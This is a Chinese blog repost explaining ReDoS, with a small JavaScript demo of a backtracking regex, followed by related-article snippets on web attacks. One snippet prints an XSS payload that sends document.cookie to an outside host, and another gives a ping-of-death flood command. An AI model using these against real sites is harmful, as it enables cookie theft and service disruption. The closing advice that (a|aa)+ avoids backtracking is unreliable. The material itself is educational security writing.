正则也会发生DoS攻击— ReDoS

已于 2022-07-19 20:56:48 修改
阅读量1.3k 收藏 1
点赞数
文章标签: javascript 正则表达式 js 安全
于 2021-05-27 14:35:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SiShen654/article/details/117327398
版权

“Regular Expression Denial of Service (ReDoS)”

什么?正则表达式也能发生拒绝服务攻击?

搜了一下,这篇文章介绍得十分详细,而且有一个触发这个漏洞的范例:
How to eliminate regular expression denial of service

有兴趣的朋友可以阅读一下。如果纯粹想体验一下这个漏洞,文中指出的 JavaScript 范例代码如下:

let regex = /("[^"]*"|[^@])*@([^@]*)/
t = performance.now()
regex.test('"""""""""""""""""""""""""""""""""""""""')
console.log(performance.now() - t)

以上代码约需时 3 秒钟运行,每多一个 " 符号,耗时增加一倍。
作者表示 64 个符号耗时两年 — no zuo no die [doge]

作者:CodingStartup起码课
转载:https://www.bilibili.com/read/cv11137947
出处: bilibili

编辑 | sishen
来源 | 前端兔
公众号 | 前端兔

关注公众号查看更多前端知识分享~~

死神654
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
几种常见攻击的正则表达式
10-26
正则表达式是一些攻击放过滤使用的,确实不错,喜欢的朋友可以研究下,不要搞破坏啊,仅供研究学习使用
php中常见的sql攻击正则表达式汇总
10-25
主要介绍了php中常见的sql攻击正则表达式,实例汇总了针对各种常见的SQL语句及正则表达式原理的分析与应用,对于PHP程序设计的安全来说具有很好的参考借鉴价值,需要的朋友可以参考下
Web安全-ReDos正则表达式的拒绝服务攻击
道阻且长,行则将至。
07-12 3511
开发人员使用了正则表达式来对用户输入的数据进行有效性校验, 当编写校验的正则表达式存在缺陷或者不严谨时, 攻击者可以构造特殊的字符串来大量消耗服务器的系统资源,造成服务器的服务中断或停止。...
浅析ReDoS的原理与实践
weixin_34150224的博客
10-18 800
转载于http://www.freebuf.com/articles/network/124422.html ReDoS(Regular expression Denial of Service)正则表达式拒绝服务攻击。开发人员使用了正则表达式来对用户输入的数据进行有效性校验, 当编写校验的正则表达式存在缺陷或者不严谨时, 攻击者可以构造特殊的字符串来大量消耗服务器的系统资源,造成服务器...
正则表达式所引发的DoS攻击(Redos
Keix
04-21 6387
转自:https://www.freebuf.com/column/201766.html 正则表达式(或正则表达式)基本上是搜索模式。例如,表达式[cb]at将匹配cat和bat。这篇文章不是介绍一个正则表达式的教程,如果你对正则表达式了解不多,可在阅读之前点击https://medium.com/factory-mind/regex-tutorial-a-simple-cheatshe...
ReDoS防范
阳光男孩的专栏
03-12 5677
ReDoS--Regular expression Denial of Service,即正则表达式拒绝服务攻击。当开发人员使用了正则表达式来对用户输入的数据进行合法性校验, 当编写校验的正则表达式存在缺陷或者不严谨时, 攻击者可以构造特殊的字符串来大量消耗服务器的系统资源,造成服务器的服务中断或停止
Java实现简单的DoS攻击
lizhengyu891231的博客
12-13 1700
转载自:https://article.itxueyuan.com/pqoRP 叙述 因需要模拟DoS攻击,所以搞了个模拟DoS攻击。 代码 import java.net.HttpURLConnection; import java.net.URL; import java.net.URLConnection; import java.util.ArrayList; import ja...
java软件攻击
yushan125的博客
03-23 645
java软件攻击
网站常用攻击技术详解
热门推荐
码上代码的博客
05-26 2万+
一、跨站脚本攻击 二、跨站请求伪造 三、SQL 注入攻击 四、拒绝服务攻击 参考资料 一、跨站脚本攻击 概念 跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。 攻击原理 例如有一个论坛网站,攻击者可以在上面发布以下内容: <script>location.href="//domain.com/?c=" + document.cookie</script> 之后该内容可能..
Java面试进阶31:Java应用开发中的注入攻击?
qililong88的博客
04-13 248
原则上提供动态执行能力的语言特性,都需要提防发生注入攻击的可能。 1)SQL 注入攻击(输入校验,不允许输入标点符号等特殊字符,或者特定结构的输入、不用完全动态的 SQL,而是利用 PreparedStatement、数据库对查询、修改等权限进行了合理限制) 2)操作系统命令注入。Java 语言提供了类似 Runtime.exec(…) 的 API,可以用来执行特定命令,假设我们构建了一个应用...
ReDoS-checker:检查您的正则表达式是否存在ReDoS漏洞
05-18
基于 在这里尝试: :
php防止sql注入示例分析和几种常见攻击正则表达式
10-26
主要介绍了php防止sql注入漏洞代码和分析,最近提供了几种常见攻击的正则表达式,大家参考使用吧
JavaScript正则也有单行模式了
10-20
主要介绍了JavaScript正则也有单行模式了,需要的朋友可以参考下
简单的Dos攻击-死亡之Ping
joshua317的博客
09-09 6064
本文为joshua317原创文章,转载请注明:转载自joshua317博客https://www.joshua317.com/article/50 简单的Dos攻击-死亡之Ping 最简单的基于IP的攻击可能要数著名的死亡之ping,这种攻击主要是由于单个包的长度超过了IP协议规范所规定的包长度。产生这样的包很容易,事实上,许多操作系统都提供了称为ping的网络工具。在为Windows操作系统中开一个DOS窗口,输入ping -l 65500 目标ip -t (65500 表示数据长度上限,-t 表示.
正则表达式的redos攻击
lucky_ly的博客
04-22 7300
正则表达式的redos攻击
ReDoS初探
zoetu
05-17 1088
ReDoS初探,什么样的正则表达式引起正则表达式攻击?
ReDoS问题的产生
weixin_45390066的博客
02-06 237
ReDoS问题的产生
3.3拒绝服务攻击
m0_56534254的博客
09-29 1185
在TCP连接建立之后,所传输的TCP报文都是带有ACK标志位,主机在接收到一个带有ACK标志位的数据包的时候,需要检查该数据包所表示的连接四元组是否存在,如果存在则检查该数据包所表示的状态是否合法,然后再向应用层传递该数据包。由于发送请求的源地址是假地址,服务器得不到确认,重试发送SYN+ACK数据包,并等待大约30秒至2分钟后丢弃这个连接,在等待的时间内服务器处于半连接状态,消耗系统资源。攻击者通过发送精心构造的、具有相同源地址和目标地址的欺骗数据包,致使缺乏相应防护机制的目标设备瘫痪。
openlayers绘制经纬网格,有添加或者移除功能
最新发布
qq_52959651的博客
05-21 121
我的项目是vue写的,当点击多选框显示隐藏经纬网格,下面直接写代码。项目需要在地图中添加经纬网格,然后看了一下官网有相关的介绍。这是删除图层相关的网站。这是绘制经纬网格方法。
正则表达式redos
01-03
redos正则表达式拒绝服务攻击)是一种利用恶意构造的正则表达式来导致服务器资源耗尽的攻击方式。当使用不恰当的正则表达式时,攻击者可以构造特殊的字符串,导致正则表达式的执行时间急剧增加,从而消耗大量的内存和CPU资源,使服务器无法继续响应其他请求。 redos攻击的原理是基于正则表达式的回溯机制。当正则表达式中存在多个可能的匹配路径时,引擎尝试所有可能的组合,直到找到一个匹配结果或者所有可能的组合都尝试完毕。这种回溯机制导致了正则表达式的执行时间与输入字符串的长度成指数关系,因此当输入字符串较长时,正则表达式的执行时间急剧增加,从而导致服务器资源耗尽。 一个经典的redos攻击示例是正则表达式 ^(a+)+$。对于简单的输入字符串 "aaaab",该正则表达式可能的匹配路径达到了16种。当输入字符串的长度增加时,匹配路径的数量呈指数级增长,导致正则表达式的执行时间急剧增加。 为了防止redos攻击,我们可以采取以下正则表达式书写建议: 1. 减少不必要的分组。 2. 降低正则表达式的复杂性。 3. 尽量精确匹配,避免重叠的写法和回溯。例如,可以使用 (a|aa)+ 替代 ^(a+)+$。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值